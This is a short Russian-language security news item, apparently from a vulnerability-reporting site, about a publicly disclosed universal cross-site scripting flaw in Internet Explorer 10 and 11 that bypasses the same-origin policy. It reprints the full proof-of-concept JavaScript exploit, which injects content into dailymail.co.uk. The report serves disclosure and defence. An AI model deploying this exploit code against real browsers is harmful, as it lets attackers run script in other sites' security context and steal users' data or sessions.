Удаленный пользователь может выполнить произвольный JavaScript сценарий в контексте безопасности любого сайта.
Сегодня появилась информация в публичном доступе о ранее неизвестной уязвимости в Microsoft Internet Explorer. Обнаруженная уязвимость позволяет злоумышленнику обойти политику единства происхождения и выполнить произвольный JavaScript сценарий в браузере жертвы в контексте безопасности произвольного сайта. Для этого жертва должна зайти на страницу, содержащую XSS-эксплоит.
PoC-код эксплоита доступен на сайте deusen.co.uk. Для демонстрации уязвимости исследователи выбрали сайт www.dailymail.co.uk. При нажатии на специально сформированную ссылку пользователь перенаправляется на сайт dailymail.co.uk, после чего ему выводится сообщение «Hacked by Deusen».
Сам код эксплоита выглядит следующим образом:
function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000);
Уязвимость присутствует в Internet Explorer 10.x и 11.x. Подробное описание уязвимости доступно по адресу: http://www.securitylab.ru/vulnerability/470863.php .
Спойлер: мы раскрываем их любимые трюки